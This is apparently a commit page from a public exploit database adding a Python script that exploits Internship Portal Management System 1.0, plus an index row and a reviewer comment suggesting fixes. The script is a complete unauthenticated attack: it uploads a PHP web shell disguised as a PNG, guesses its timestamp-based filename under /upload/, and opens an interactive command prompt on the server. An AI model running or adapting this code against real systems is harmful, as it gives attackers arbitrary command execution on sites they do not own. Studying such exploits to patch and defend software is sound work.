DB: 2021-05-05
1 changes to exploits/shellcodes Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
parent
dcd1229758
commit
b8cf9ea0fc
2 changed files with 75 additions and 0 deletions
74
exploits/php/webapps/49823.py
Executable file
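--- a/exploits/php/webapps/49823.py
+++ b/exploits/php/webapps/49823.py
@@ -0,0 +1,74 @@
+# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
+# Date: 2021-05-04
+# Exploit Author: argenestel
+# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Debian 10
+
+import requests
+import time
+
+#change the url to the site running the vulnerable system
+url="http://127.0.0.1:4000"
+#burp proxy
+proxies = {
+"http": "http://127.0.0.1:8080",
+}
+#payload
+payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
+
+#the upload point
+insert_url=url+"/inserty.php"
+
+def fill_details():
+global payload
+global shellend
+global shellstart
+print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
+#time start
+shellstart=int(time.time())
+#print(shellstart)
+files = {'file':('shell.php',payload,
+'image/png', {'Content-Disposition': 'form-data'}
+)
+}
+data = {
+"company_name":"some",
+"first_name":"some",
+"last_name":"some",
+"email":"some@some.com",
+"gender":"Male",
+"insert_button":"Apply",
+"terms":"on"
+}
+r = requests.post(insert_url, data=data, files=files)
+if r.status_code == 200:
+print("Exploited Intern System Successfully...")
+shellend = int(time.time())
+#print(shellend)
+shell()
+else:
+print("Exploit Failed")
+
+def shell():
+for shellname in range(shellstart, shellend+1):
+shellstr=str(shellname)
+shell_url=url+"/upload/"+shellstr+"_shell.php"
+r = requests.get(shell_url)
+if r.status_code == 200:
+shell_url=url+"/upload/"+shellstr+"_shell.php"
+break
+
+r = requests.get(shell_url)
+if r.status_code == 200:
+print("Shell Starting...")
+while True:
+cmd=input("cmd$ ")
+r = requests.get(shell_url+"?cmd="+cmd)
+print(r.text)
+else:
+print("File Name Error")
+
+
+fill_details()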
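Review bot: The header comments of 49823.py name the product and version but never state the root cause or a remediation, so a defender reading this entry has to infer both from the request code. From the visible lines, `inserty.php` is sent a part named `shell.php` with a client-declared `image/png` type and no session or credentials, and `shell()` then looks for the file under `/upload/` with a Unix-timestamp prefix; this suggests (not confirmed from the page) that the application trusts the declared content type, keeps the `.php` extension, and stores uploads in a web-served directory under a predictable name. I would add a short comment block under `# Tested on:` that states this root cause and lists the fixes: require authentication on the upload endpoint, allow-list extensions and verify content server-side, store uploads outside the web root or with script execution disabled, and use unguessable stored names. Separately, `if r.status_code == 200:` in `fill_details()` prints the success message before the stored file is confirmed, so anyone running the script to check a patched install can get a misleading result; the message belongs after the check in `shell()`.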
@ -43990,3 +43990,4 @@ id,file,description,date,author,type,platform,port
|
||||||
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
|
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
|
||||||
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
||||||
49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
||||||
|
49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,
|
||||||
|
|